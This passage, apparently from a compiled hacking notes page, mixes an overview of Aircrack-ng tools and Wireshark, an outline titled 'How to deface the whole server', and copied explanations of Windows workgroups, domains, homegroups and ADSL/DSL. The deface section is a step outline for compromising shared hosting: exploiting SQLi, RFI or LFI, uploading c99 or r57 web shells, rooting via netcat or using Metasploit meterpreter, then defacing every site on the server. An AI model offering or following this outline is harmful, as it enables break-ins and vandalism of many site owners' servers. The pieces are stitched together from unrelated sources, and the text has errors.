Dictionary attacks), airdecap-ng (which can
decrypts WEP or WPA encrypted capture
files), airmon-ng (which places network cards
into monitor mode, for example when using
the Alfa Security Scanner with rtl8187),
aireplay-ng (which is a packet injector),
airodump-ng (which is a packet sniffer),
airtun-ng (which allows for virtual tunnel
interfaces), airolib-ng (which stores and
manages ESSID and password lists),
packetforge-ng (which can create encrypted
packets for injection), airbase-ng (which
incorporates techniques for attacking clients)
and airdecloak-ng (which removes WEP
cloaking). Other tools include airdriver-ng (to
manage wireless drivers), airolib-ng (to store
and manages ESSID and password lists and
compute Pairwise Master Keys), airserv-ng
(which allows the penetration tester to
access the wireless card from other
computers). Airolib-ng is similiar to easside-
ng which allows the user to run tools on a
remote computer, easside-ng (permits a
means to communicate to an access point,
without the WEP key), tkiptun-ng (for WPA/
TKIP attacks) and wesside-ng (which an an
automatic tool for recovering wep keys).
Like most of the security tools in our list,
Aircrack also has a GUI interface – called
Gerix Wifi Cracker. Gerix is a freely licensed
security tool under the GNU General Public
License and is bundled within penetration
testing Linux distributions such a kali linux ,
BackTrack And Backbox. The Gerix GUI has
several penetration testing tools that allow
for network analysis, wireless packet
capturing, and SQL packet injection.

Wireshark

Wireshark has been around for ages and is
extremely popular. Wireshark allows the
pentester to put a network interface into a
promiscuous mode and therefore see all
traffic. This tool has many features such as
being able to capture data from live network
connection or read from a file that saved
already-captured packets. Wireshark is able
to read data from a wide variety of
networks, from Ethernet, IEEE 802.11, PPP,
and even loopback. Like most tools in our
2013 Concise Courses Security List the
captured network data can be monitored and
managed via a GUI – which also allows for
plug-ins to be inserted and used. Wireshark
can also capture VoIP packets and raw USB
traffic can also be captured.

How to deface the whole server

There are two type of server
1-shared server
2-independent server
in shared server there are lot of website
running on that server .that's why hacking all
websites is easier.
for mass deface firstly we can find the vuln
website(sqli, rfi,lfi)
after that you can upload your shell
(c99 ,r57)
then if it is Linux server then you can
symlink the server or rooted the server by
using net cat
if it is windows server then you can use
metasploit
for that you can create vuln file and
executed by the shell.after that you got
meterpreter and by using that you have fully
access on all websites for deface

What is the difference between a domain, a workgroup, and a homegroup? Domains, workgroups, and homegroups

They represent different methods for organizing
computers in networks. The main difference
among them is how the computers and other
resources on the networks are managed.
Computers running Windows on a network
must be part of a workgroup or a domain.
Computers running Windows on home
networks can also be part of a homegroup,
but it's not required.
Computers on home networks are usually
part of a workgroup and possibly a
homegroup, and computers on workplace
networks are usually part of a domain.
In a workgroup:
============
All computers are peers; no computer has
control over another computer.
Each computer has a set of user accounts. To
log on to any computer in the workgroup,
you must have an account on that computer.
There are typically no more than twenty
computers.
A workgroup is not protected by a password.
All computers must be on the same local
network or subnet.
In a homegroup:
=============
Computers on a home network must belong
to a workgroup, but they can also belong to
a homegroup. A homegroup makes it easy to
share pictures, music, videos, documents,
and printers with other people on a home
network.
A homegroup is protected with a password,
but you only need to type the password
once, when adding your computer to the
homegroup.
In a domain:
==========
One or more computers are servers. Network
administrators use servers to control the
security and permissions for all computers
on the domain. This makes it easy to make
changes because the changes are
automatically made to all computers. Domain
users must provide a password or other
credentials each time they access the
domain.
If you have a user account on the domain,
you can log on to any computer on the
domain without needing an account on that
computer.
You probably can make only limited changes
to a computer's settings because network
administrators often want to ensure
consistency among computers.
There can be thousands of computers in a
domain.
The computers can be on different local
networks.
==========================================
Note : - Info Based and copied from MS
official Website , For more u can visit &
learn From Microsoft Website
===========================================

Asymmetric digital subscriber line ( ADSL ) & Digital subscriber line (DSL )

Asymmetric digital subscriber line (ADSL) is a
type of digital subscriber line (DSL)
technology, a data communications
technology that enables faster data
transmission over copper telephone lines
than a conventional voiceband modem can
provide. It does this by utilizing frequencies
that are not used by a voice telephone call. A
splitter, or DSL filter, allows a single
telephone connection to be used for both
ADSL service and voice calls at the same
time. ADSL can generally only be distributed
over short distances from the telephone
exchange (the last mile),
Note :- typically less than 4 kilometres (2
mi), but has been known to exceed 8
kilometres (5 mi) if the originally laid wire
gauge allows for further distribution.
At the telephone exchange the line generally
terminates at a digital subscriber line access
multiplexer (DSLAM) where another
frequency splitter separates the voice band
signal for the conventional phone network.
Data carried by the ADSL are typically routed
over the telephone company's data network
and eventually reach a conventional Internet
Protocol network.
ADSL (Asymmetric Digital Subscriber Line)
uses an ordinary phone line to deliver a
high-speed Internet connection. It does this
by converting the data from your computer
into high-frequency signals. These high-
frequency signals can travel along a
telephone cable at the same time as a voice
call because the ADSL and voice signals use
different frequency ranges
Digital subscriber line (DSL; originally digital
subscriber loop) is a family of technologies
that provide internet access by transmitting
digital data using a local telephone network
which uses the Public switched telephone
network. In telecommunications marketing,
the term DSL is widely understood to mean
asymmetric digital subscriber line (ADSL), the
most commonly installed DSL technology.
DSL service is delivered simultaneously with
wired telephone service on the same
telephone line. This is possible because DSL
uses higher frequency bands for data. On the
customer premises, a DSL filter on each non-
DSL outlet blocks any high frequency
interference, to enable simultaneous use of
the voice and DSL services.
The bit rate of consumer DSL services
typically ranges from 256 kbit/s to over 100
Mbit/s in the direction to the customer
(downstream), depending on DSL technology,
line conditions, and service-level
implementation. Bit rates of 1 Gbit/s have
been reached in trials. In ADSL, the data
throughput in the upstream direction, (the
direction to the service provider) is lower,
hence the designation of asymmetric service.
Note:- In symmetric digital subscriber line
(SDSL) services, the downstream and
upstream data rates are equal.
Researchers at Bell Labs have reached
broadband speeds of 10Gbps, while
delivering 1Gbit/s symmetrical ultra-
broadband access services using traditional
copper telephone lines. These speeds can be
achieved with existing telephone lines and
can be used to deliver broadband where
fiber optic cables can't be installed to the
premise.
A 2007 book described DSL as "the most
globally prolific broadband access
technology, yet it is only available to around
60–75 percent of the population in many
developed countries." A 2012 survey found
that "DSL continues to be the dominant
technology for broadband access" with 364.1
million subscribers worldwide